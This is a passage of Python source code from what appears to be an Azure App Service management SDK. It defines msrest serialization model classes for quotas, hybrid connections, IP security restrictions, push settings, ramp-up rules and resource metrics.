    def __init__(self, **kwargs):
        super(CorsSettings, self).__init__(**kwargs)
        # Optional; None means no explicit origin list was provided.
        self.allowed_origins = kwargs.get('allowed_origins')
class CsmUsageQuota(msrest.serialization.Model):
    """Describes usage of a quota resource.

    :param unit: Units of measurement for the quota resource.
    :type unit: str
    :param next_reset_time: Next reset time for the resource counter.
    :type next_reset_time: ~datetime.datetime
    :param current_value: The current value of the resource counter.
    :type current_value: long
    :param limit: The resource limit.
    :type limit: long
    :param name: Quota name.
    :type name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'unit': {'key': 'unit', 'type': 'str'},
        'next_reset_time': {'key': 'nextResetTime', 'type': 'iso-8601'},
        'current_value': {'key': 'currentValue', 'type': 'long'},
        'limit': {'key': 'limit', 'type': 'long'},
        'name': {'key': 'name', 'type': 'LocalizableString'},
    }

    def __init__(self, **kwargs):
        super(CsmUsageQuota, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('unit', 'next_reset_time', 'current_value', 'limit', 'name'):
            setattr(self, _attr, kwargs.get(_attr))
class CsmUsageQuotaCollection(msrest.serialization.Model):
    """A page of CSM usage quotas.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[CsmUsageQuota]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(CsmUsageQuotaCollection, self).__init__(**kwargs)
        # Required: a missing 'value' key raises KeyError.
        self.value = kwargs['value']
        # Read-only; the server fills this in on responses.
        self.next_link = None
class ErrorEntity(msrest.serialization.Model):
    """Error payload returned from the API.

    :param extended_code: Type of error.
    :type extended_code: str
    :param message_template: Message template.
    :type message_template: str
    :param parameters: Parameters for the template.
    :type parameters: list[str]
    :param inner_errors: Inner errors.
    :type inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
    :param code: Basic error code.
    :type code: str
    :param message: Any details of the error.
    :type message: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'extended_code': {'key': 'extendedCode', 'type': 'str'},
        'message_template': {'key': 'messageTemplate', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': '[str]'},
        'inner_errors': {'key': 'innerErrors', 'type': '[ErrorEntity]'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ErrorEntity, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('extended_code', 'message_template', 'parameters',
                      'inner_errors', 'code', 'message'):
            setattr(self, _attr, kwargs.get(_attr))
class Experiments(msrest.serialization.Model):
    """Routing rules used by production experiments.

    :param ramp_up_rules: List of ramp-up rules.
    :type ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'ramp_up_rules': {'key': 'rampUpRules', 'type': '[RampUpRule]'},
    }

    def __init__(self, **kwargs):
        super(Experiments, self).__init__(**kwargs)
        # Optional; None when no ramp-up rules are configured.
        self.ramp_up_rules = kwargs.get('ramp_up_rules')
class HandlerMapping(msrest.serialization.Model):
    """IIS handler mapping: routes HTTP requests with a given extension to a handler.

    For example, it is used to configure php-cgi.exe process to handle all HTTP
    requests with the *.php extension.

    :param extension: Requests with this extension will be handled using the specified FastCGI
     application.
    :type extension: str
    :param script_processor: The absolute path to the FastCGI application.
    :type script_processor: str
    :param arguments: Command-line arguments to be passed to the script processor.
    :type arguments: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'extension': {'key': 'extension', 'type': 'str'},
        'script_processor': {'key': 'scriptProcessor', 'type': 'str'},
        'arguments': {'key': 'arguments', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(HandlerMapping, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('extension', 'script_processor', 'arguments'):
            setattr(self, _attr, kwargs.get(_attr))
class HostingEnvironmentDiagnostics(msrest.serialization.Model):
    """Diagnostics information for an App Service Environment.

    :param name: Name/identifier of the diagnostics.
    :type name: str
    :param diagnosics_output: Diagnostics output.
    :type diagnosics_output: str
    """

    # NOTE(review): the "diagnosics" misspelling appears in both the attribute
    # name and the wire key of the generated contract — do not "correct" it,
    # as both are part of the public interface.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'diagnosics_output': {'key': 'diagnosicsOutput', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(HostingEnvironmentDiagnostics, self).__init__(**kwargs)
        # Both properties are optional; unset ones become None.
        self.name = kwargs.get('name')
        self.diagnosics_output = kwargs.get('diagnosics_output')
class HostingEnvironmentProfile(msrest.serialization.Model):
    """Identifies the App Service Environment to use for this resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param id: Resource ID of the App Service Environment.
    :type id: str
    :ivar name: Name of the App Service Environment.
    :vartype name: str
    :ivar type: Resource type of the App Service Environment.
    :vartype type: str
    """

    _validation = {
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(HostingEnvironmentProfile, self).__init__(**kwargs)
        # Only 'id' is caller-settable.
        self.id = kwargs.get('id')
        # Read-only; the server fills these in on responses.
        self.name = None
        self.type = None
class HostNameSslState(msrest.serialization.Model):
    """SSL state for a hostname bound to the app.

    :param name: Hostname.
    :type name: str
    :param ssl_state: SSL type. Possible values include: "Disabled", "SniEnabled",
     "IpBasedEnabled".
    :type ssl_state: str or ~azure.mgmt.web.v2016_09_01.models.SslState
    :param virtual_ip: Virtual IP address assigned to the hostname if IP based SSL is enabled.
    :type virtual_ip: str
    :param thumbprint: SSL certificate thumbprint.
    :type thumbprint: str
    :param to_update: Set to :code:`<code>true</code>` to update existing hostname.
    :type to_update: bool
    :param host_type: Indicates whether the hostname is a standard or repository hostname. Possible
     values include: "Standard", "Repository".
    :type host_type: str or ~azure.mgmt.web.v2016_09_01.models.HostType
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'ssl_state': {'key': 'sslState', 'type': 'str'},
        'virtual_ip': {'key': 'virtualIP', 'type': 'str'},
        'thumbprint': {'key': 'thumbprint', 'type': 'str'},
        'to_update': {'key': 'toUpdate', 'type': 'bool'},
        'host_type': {'key': 'hostType', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(HostNameSslState, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('name', 'ssl_state', 'virtual_ip', 'thumbprint',
                      'to_update', 'host_type'):
            setattr(self, _attr, kwargs.get(_attr))
class HybridConnection(ProxyOnlyResource):
    """Contract describing and configuring a Hybrid Connection.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param service_bus_namespace: The name of the Service Bus namespace.
    :type service_bus_namespace: str
    :param relay_name: The name of the Service Bus relay.
    :type relay_name: str
    :param relay_arm_uri: The ARM URI to the Service Bus relay.
    :type relay_arm_uri: str
    :param hostname: The hostname of the endpoint.
    :type hostname: str
    :param port: The port of the endpoint.
    :type port: int
    :param send_key_name: The name of the Service Bus key which has Send permissions. This is used
     to authenticate to Service Bus.
    :type send_key_name: str
    :param send_key_value: The value of the Service Bus key. This is used to authenticate to
     Service Bus. In ARM this key will not be returned
     normally, use the POST /listKeys API instead.
    :type send_key_value: str
    :param service_bus_suffix: The suffix for the service bus endpoint. By default this is
     .servicebus.windows.net.
    :type service_bus_suffix: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'service_bus_namespace': {'key': 'properties.serviceBusNamespace', 'type': 'str'},
        'relay_name': {'key': 'properties.relayName', 'type': 'str'},
        'relay_arm_uri': {'key': 'properties.relayArmUri', 'type': 'str'},
        'hostname': {'key': 'properties.hostname', 'type': 'str'},
        'port': {'key': 'properties.port', 'type': 'int'},
        'send_key_name': {'key': 'properties.sendKeyName', 'type': 'str'},
        'send_key_value': {'key': 'properties.sendKeyValue', 'type': 'str'},
        'service_bus_suffix': {'key': 'properties.serviceBusSuffix', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # The base class consumes the common resource fields (id/name/kind/type).
        super(HybridConnection, self).__init__(**kwargs)
        # Connection-specific properties are all optional and default to None.
        for _attr in ('service_bus_namespace', 'relay_name', 'relay_arm_uri',
                      'hostname', 'port', 'send_key_name', 'send_key_value',
                      'service_bus_suffix'):
            setattr(self, _attr, kwargs.get(_attr))
class HybridConnectionCollection(msrest.serialization.Model):
    """Collection of Hybrid Connections.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.HybridConnection]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[HybridConnection]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(HybridConnectionCollection, self).__init__(**kwargs)
        # 'value' is required; a missing key raises KeyError, matching _validation.
        self.value = kwargs['value']
        # Read-only; the server fills this in on responses.
        self.next_link = None
class HybridConnectionKey(ProxyOnlyResource):
    """Send key name/value pair for a Hybrid Connection.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar send_key_name: The name of the send key.
    :vartype send_key_name: str
    :ivar send_key_value: The value of the send key.
    :vartype send_key_value: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'send_key_name': {'readonly': True},
        'send_key_value': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'send_key_name': {'key': 'properties.sendKeyName', 'type': 'str'},
        'send_key_value': {'key': 'properties.sendKeyValue', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # The base class consumes the common resource fields (id/name/kind/type).
        super(HybridConnectionKey, self).__init__(**kwargs)
        # Both key fields are read-only and populated by the server.
        self.send_key_name = None
        self.send_key_value = None
class HybridConnectionLimits(ProxyOnlyResource):
    """Plan limits for Hybrid Connections (current count and allowed maximum).

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar current: The current number of Hybrid Connections.
    :vartype current: int
    :ivar maximum: The maximum number of Hybrid Connections allowed.
    :vartype maximum: int
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'current': {'readonly': True},
        'maximum': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'current': {'key': 'properties.current', 'type': 'int'},
        'maximum': {'key': 'properties.maximum', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        # The base class consumes the common resource fields (id/name/kind/type).
        super(HybridConnectionLimits, self).__init__(**kwargs)
        # Both limits are read-only and populated by the server.
        self.current = None
        self.maximum = None
class IpSecurityRestriction(msrest.serialization.Model):
    """An IP-based security restriction applied to an app.

    All required parameters must be populated in order to send to Azure.

    :param ip_address: Required. IP address the security restriction is valid for.
    :type ip_address: str
    :param subnet_mask: Subnet mask for the range of IP addresses the restriction is valid for.
    :type subnet_mask: str
    """

    _validation = {
        'ip_address': {'required': True},
    }

    _attribute_map = {
        'ip_address': {'key': 'ipAddress', 'type': 'str'},
        'subnet_mask': {'key': 'subnetMask', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(IpSecurityRestriction, self).__init__(**kwargs)
        # Required: a missing 'ip_address' key raises KeyError.
        self.ip_address = kwargs['ip_address']
        # Optional; None means the restriction targets a single address.
        self.subnet_mask = kwargs.get('subnet_mask')
class LocalizableString(msrest.serialization.Model):
    """A string paired with its localized form.

    :param value: Non-localized name.
    :type value: str
    :param localized_value: Localized name.
    :type localized_value: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'value': {'key': 'value', 'type': 'str'},
        'localized_value': {'key': 'localizedValue', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(LocalizableString, self).__init__(**kwargs)
        # Both properties are optional; unset ones become None.
        self.value = kwargs.get('value')
        self.localized_value = kwargs.get('localized_value')
class ManagedServiceIdentity(msrest.serialization.Model):
    """Identity information for a managed service.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param type: Type of managed service identity. Possible values include: "SystemAssigned".
    :type type: str or ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentityType
    :ivar tenant_id: Tenant of managed service identity.
    :vartype tenant_id: str
    :ivar principal_id: Principal Id of managed service identity.
    :vartype principal_id: str
    """

    _validation = {
        'tenant_id': {'readonly': True},
        'principal_id': {'readonly': True},
    }

    _attribute_map = {
        'type': {'key': 'type', 'type': 'str'},
        'tenant_id': {'key': 'tenantId', 'type': 'str'},
        'principal_id': {'key': 'principalId', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ManagedServiceIdentity, self).__init__(**kwargs)
        # Only 'type' is caller-settable.
        self.type = kwargs.get('type')
        # Read-only; the server fills these in on responses.
        self.tenant_id = None
        self.principal_id = None
class MetricAvailabilily(msrest.serialization.Model):
    """Availability and retention of a metric.

    NOTE(review): the misspelled class name ("Availabilily") is part of the
    generated public API and must not be renamed.

    :param time_grain: Time grain.
    :type time_grain: str
    :param retention: Retention period for the current time grain.
    :type retention: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'time_grain': {'key': 'timeGrain', 'type': 'str'},
        'retention': {'key': 'retention', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MetricAvailabilily, self).__init__(**kwargs)
        # Both properties are optional; unset ones become None.
        self.time_grain = kwargs.get('time_grain')
        self.retention = kwargs.get('retention')
class MetricDefinition(ProxyOnlyResource):
    """Server-supplied metadata describing a metric.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar name_properties_name: Name of the metric.
    :vartype name_properties_name: str
    :ivar unit: Unit of the metric.
    :vartype unit: str
    :ivar primary_aggregation_type: Primary aggregation type.
    :vartype primary_aggregation_type: str
    :ivar metric_availabilities: List of time grains supported for the metric together with
     retention period.
    :vartype metric_availabilities: list[~azure.mgmt.web.v2016_09_01.models.MetricAvailabilily]
    :ivar display_name: Friendly name shown in the UI.
    :vartype display_name: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'name_properties_name': {'readonly': True},
        'unit': {'readonly': True},
        'primary_aggregation_type': {'readonly': True},
        'metric_availabilities': {'readonly': True},
        'display_name': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'unit': {'key': 'properties.unit', 'type': 'str'},
        'primary_aggregation_type': {'key': 'properties.primaryAggregationType', 'type': 'str'},
        'metric_availabilities': {'key': 'properties.metricAvailabilities', 'type': '[MetricAvailabilily]'},
        'display_name': {'key': 'properties.displayName', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # The base class consumes the common resource fields (id/name/kind/type).
        super(MetricDefinition, self).__init__(**kwargs)
        # All metric properties are read-only and populated by the server.
        for _attr in ('name_properties_name', 'unit', 'primary_aggregation_type',
                      'metric_availabilities', 'display_name'):
            setattr(self, _attr, None)
class NameValuePair(msrest.serialization.Model):
    """A simple name/value pair.

    :param name: Pair name.
    :type name: str
    :param value: Pair value.
    :type value: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'value': {'key': 'value', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(NameValuePair, self).__init__(**kwargs)
        # Both properties are optional; unset ones become None.
        self.name = kwargs.get('name')
        self.value = kwargs.get('value')
class NetworkAccessControlEntry(msrest.serialization.Model):
    """A single network access control entry.

    :param action: Action object. Possible values include: "Permit", "Deny".
    :type action: str or ~azure.mgmt.web.v2016_09_01.models.AccessControlEntryAction
    :param description: Description of network access control entry.
    :type description: str
    :param order: Order of precedence.
    :type order: int
    :param remote_subnet: Remote subnet.
    :type remote_subnet: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'action': {'key': 'action', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'order': {'key': 'order', 'type': 'int'},
        'remote_subnet': {'key': 'remoteSubnet', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(NetworkAccessControlEntry, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('action', 'description', 'order', 'remote_subnet'):
            setattr(self, _attr, kwargs.get(_attr))
class Operation(msrest.serialization.Model):
    """Represents an operation performed on a resource.

    :param id: Operation ID.
    :type id: str
    :param name: Operation name.
    :type name: str
    :param status: The current status of the operation. Possible values include: "InProgress",
     "Failed", "Succeeded", "TimedOut", "Created".
    :type status: str or ~azure.mgmt.web.v2016_09_01.models.OperationStatus
    :param errors: Any errors associate with the operation.
    :type errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
    :param created_time: Time when operation has started.
    :type created_time: ~datetime.datetime
    :param modified_time: Time when operation has been updated.
    :type modified_time: ~datetime.datetime
    :param expiration_time: Time when operation will expire.
    :type expiration_time: ~datetime.datetime
    :param geo_master_operation_id: Applicable only for stamp operation ids.
    :type geo_master_operation_id: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'status': {'key': 'status', 'type': 'str'},
        'errors': {'key': 'errors', 'type': '[ErrorEntity]'},
        'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
        'modified_time': {'key': 'modifiedTime', 'type': 'iso-8601'},
        'expiration_time': {'key': 'expirationTime', 'type': 'iso-8601'},
        'geo_master_operation_id': {'key': 'geoMasterOperationId', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(Operation, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('id', 'name', 'status', 'errors', 'created_time',
                      'modified_time', 'expiration_time',
                      'geo_master_operation_id'):
            setattr(self, _attr, kwargs.get(_attr))
class PushSettings(ProxyOnlyResource):
    """Push notification settings for the App.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param is_push_enabled: Gets or sets a flag indicating whether the Push endpoint is enabled.
    :type is_push_enabled: bool
    :param tag_whitelist_json: Gets or sets a JSON string containing a list of tags that are
     whitelisted for use by the push registration endpoint.
    :type tag_whitelist_json: str
    :param tags_requiring_auth: Gets or sets a JSON string containing a list of tags that require
     user authentication to be used in the push registration endpoint.
     Tags can consist of alphanumeric characters and the following:
     '_', '@', '#', '.', ':', '-'.
     Validation should be performed at the PushRequestHandler.
    :type tags_requiring_auth: str
    :param dynamic_tags_json: Gets or sets a JSON string containing a list of dynamic tags that
     will be evaluated from user claims in the push registration endpoint.
    :type dynamic_tags_json: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'is_push_enabled': {'key': 'properties.isPushEnabled', 'type': 'bool'},
        'tag_whitelist_json': {'key': 'properties.tagWhitelistJson', 'type': 'str'},
        'tags_requiring_auth': {'key': 'properties.tagsRequiringAuth', 'type': 'str'},
        'dynamic_tags_json': {'key': 'properties.dynamicTagsJson', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # The base class consumes the common resource fields (id/name/kind/type).
        super(PushSettings, self).__init__(**kwargs)
        # Push-specific properties are all optional and default to None.
        for _attr in ('is_push_enabled', 'tag_whitelist_json',
                      'tags_requiring_auth', 'dynamic_tags_json'):
            setattr(self, _attr, kwargs.get(_attr))
class RampUpRule(msrest.serialization.Model):
    """A routing rule for ramp-up testing.

    Allows redirecting a static percentage of traffic to a slot, or gradually
    changing the routing percentage based on performance.

    :param action_host_name: Hostname of a slot to which the traffic will be redirected if decided
     to. E.g. myapp-stage.azurewebsites.net.
    :type action_host_name: str
    :param reroute_percentage: Percentage of the traffic which will be redirected to
     :code:`<code>ActionHostName</code>`.
    :type reroute_percentage: float
    :param change_step: In auto ramp up scenario this is the step to add/remove from
     :code:`<code>ReroutePercentage</code>` until it reaches
     :code:`<code>MinReroutePercentage</code>` or :code:`<code>MaxReroutePercentage</code>`. Site
     metrics are checked every N minutes specified in :code:`<code>ChangeIntervalInMinutes</code>`.
     Custom decision algorithm can be provided in TiPCallback site extension which URL can be
     specified in :code:`<code>ChangeDecisionCallbackUrl</code>`.
    :type change_step: float
    :param change_interval_in_minutes: Specifies interval in minutes to reevaluate
     ReroutePercentage.
    :type change_interval_in_minutes: int
    :param min_reroute_percentage: Specifies lower boundary above which ReroutePercentage will
     stay.
    :type min_reroute_percentage: float
    :param max_reroute_percentage: Specifies upper boundary below which ReroutePercentage will
     stay.
    :type max_reroute_percentage: float
    :param change_decision_callback_url: Custom decision algorithm can be provided in TiPCallback
     site extension which URL can be specified. See TiPCallback site extension for the scaffold and
     contracts.
     https://www.siteextensions.net/packages/TiPCallback/.
    :type change_decision_callback_url: str
    :param name: Name of the routing rule. The recommended name would be to point to the slot which
     will receive the traffic in the experiment.
    :type name: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'action_host_name': {'key': 'actionHostName', 'type': 'str'},
        'reroute_percentage': {'key': 'reroutePercentage', 'type': 'float'},
        'change_step': {'key': 'changeStep', 'type': 'float'},
        'change_interval_in_minutes': {'key': 'changeIntervalInMinutes', 'type': 'int'},
        'min_reroute_percentage': {'key': 'minReroutePercentage', 'type': 'float'},
        'max_reroute_percentage': {'key': 'maxReroutePercentage', 'type': 'float'},
        'change_decision_callback_url': {'key': 'changeDecisionCallbackUrl', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(RampUpRule, self).__init__(**kwargs)
        # Every property is optional; unset ones become None.
        for _attr in ('action_host_name', 'reroute_percentage', 'change_step',
                      'change_interval_in_minutes', 'min_reroute_percentage',
                      'max_reroute_percentage', 'change_decision_callback_url',
                      'name'):
            setattr(self, _attr, kwargs.get(_attr))
class RequestsBasedTrigger(msrest.serialization.Model):
    """A trigger keyed off the total request count.

    :param count: Request Count.
    :type count: int
    :param time_interval: Time interval.
    :type time_interval: str
    """

    # Maps Python attribute names to wire keys/types for msrest serialization.
    _attribute_map = {
        'count': {'key': 'count', 'type': 'int'},
        'time_interval': {'key': 'timeInterval', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(RequestsBasedTrigger, self).__init__(**kwargs)
        # Both properties are optional; unset ones become None.
        self.count = kwargs.get('count')
        self.time_interval = kwargs.get('time_interval')
class ResourceCollection(msrest.serialization.Model):
    """A page of resource identifiers.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[str]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[str]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ResourceCollection, self).__init__(**kwargs)
        # Required: a missing 'value' key raises KeyError.
        self.value = kwargs['value']
        # Read-only; the server fills this in on responses.
        self.next_link = None
class ResourceMetric(msrest.serialization.Model):
    """A metric reported for a resource; all fields are server-populated.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar name: Name of metric.
    :vartype name: ~azure.mgmt.web.v2016_09_01.models.ResourceMetricName
    :ivar unit: Metric unit.
    :vartype unit: str
    :ivar time_grain: Metric granularity. E.g PT1H, PT5M, P1D.
    :vartype time_grain: str
    :ivar start_time: Metric start time.
    :vartype start_time: ~datetime.datetime
    :ivar end_time: Metric end time.
    :vartype end_time: ~datetime.datetime
    :ivar resource_id: Metric resource Id.
    :vartype resource_id: str
    :ivar id: Resource Id.
    :vartype id: str
    :ivar metric_values: Metric values.
    :vartype metric_values: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricValue]
    :ivar properties: Resource metric properties collection.
    :vartype properties: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricProperty]
    """

    _validation = {
        'name': {'readonly': True},
        'unit': {'readonly': True},
        'time_grain': {'readonly': True},
        'start_time': {'readonly': True},
        'end_time': {'readonly': True},
        'resource_id': {'readonly': True},
        'id': {'readonly': True},
        'metric_values': {'readonly': True},
        'properties': {'readonly': True},
    }

    _attribute_map = {
        'name': {'key': 'name', 'type': 'ResourceMetricName'},
        'unit': {'key': 'unit', 'type': 'str'},
        'time_grain': {'key': 'timeGrain', 'type': 'str'},
        'start_time': {'key': 'startTime', 'type': 'iso-8601'},
        'end_time': {'key': 'endTime', 'type': 'iso-8601'},
        'resource_id': {'key': 'resourceId', 'type': 'str'},
        'id': {'key': 'id', 'type': 'str'},
        'metric_values': {'key': 'metricValues', 'type': '[ResourceMetricValue]'},
        'properties': {'key': 'properties', 'type': '[ResourceMetricProperty]'},
    }

    def __init__(self, **kwargs):
        super(ResourceMetric, self).__init__(**kwargs)
        # All fields are read-only and populated by the server on responses.
        for _attr in ('name', 'unit', 'time_grain', 'start_time', 'end_time',
                      'resource_id', 'id', 'metric_values', 'properties'):
            setattr(self, _attr, None)
class ResourceMetricAvailability(msrest.serialization.Model):
    """Server-populated metric availability and retention.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar time_grain: Time grain.
    :vartype time_grain: str
    :ivar retention: Retention period for the current time grain.
    :vartype retention: str
    """

    _validation = {
        'time_grain': {'readonly': True},
        'retention': {'readonly': True},
    }

    _attribute_map = {
        'time_grain': {'key': 'timeGrain', 'type': 'str'},
        'retention': {'key': 'retention', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ResourceMetricAvailability, self).__init__(**kwargs)
        # Both fields are read-only and populated by the server.
        self.time_grain = None
        self.retention = None
class ResourceMetricCollection(msrest.serialization.Model):
    """A page of metric responses.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetric]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ResourceMetric]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ResourceMetricCollection, self).__init__(**kwargs)
        # Required: a missing 'value' key raises KeyError.
        self.value = kwargs['value']
        # Read-only; the server fills this in on responses.
        self.next_link = None
class ResourceMetricDefinition(ProxyOnlyResource):
    """Metadata for the metrics.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar name_properties_name: Name of the metric.
    :vartype name_properties_name: ~azure.mgmt.web.v2016_09_01.models.ResourceMetricName
    :ivar unit: Unit of the metric.
    :vartype unit: str
    :ivar primary_aggregation_type: Primary aggregation type.
    :vartype primary_aggregation_type: str
    :ivar metric_availabilities: List of time grains supported for the metric together with
     retention period.
    :vartype metric_availabilities:
     list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricAvailability]
    :ivar resource_uri: Resource URI.
    :vartype resource_uri: str
    :ivar id_properties_id: Resource ID.
    :vartype id_properties_id: str
